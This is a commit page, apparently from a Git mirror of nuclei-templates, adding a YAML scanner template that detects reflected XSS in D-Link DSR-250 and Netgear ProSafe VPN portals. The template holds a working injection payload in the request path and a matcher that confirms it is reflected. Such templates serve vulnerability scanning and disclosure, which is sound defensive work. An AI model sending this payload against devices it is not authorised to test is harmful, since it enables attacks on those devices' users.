daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create dlink-netgear-xss.yaml

patch-1
gtrrnr 2023-11-24 17:39:42 +03:00 committed by GitHub
parent 9b8da6f22d
commit d6da91b0f9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
http/iot/dlink-netgear-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: dlink-netgear-xss
info:
name: Dlink DSR-250 and Netgear Prosafe - XSS on endpoint scgi-bin/platform.cgi
author: gtrrnr,vulnspace
severity: medium
description: Dlink DSR-250 and Netgear Prosafe are vulnerable to reflected cross site scripting endpoint scgi-bin/platform.cgi in parameter SSLVPN.
reference:
- https://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_june_2015.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
cvss-score: 4.3
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
tags: xss,dlink,netgear
http:
- method: GET
path:
- '{{BaseURL}}/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSLVPN"><script>alert("netgear_dlink_xss")</script>'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "SSLVPN\"><script>alert(\"netgear_dlink_xss\")")'
condition: and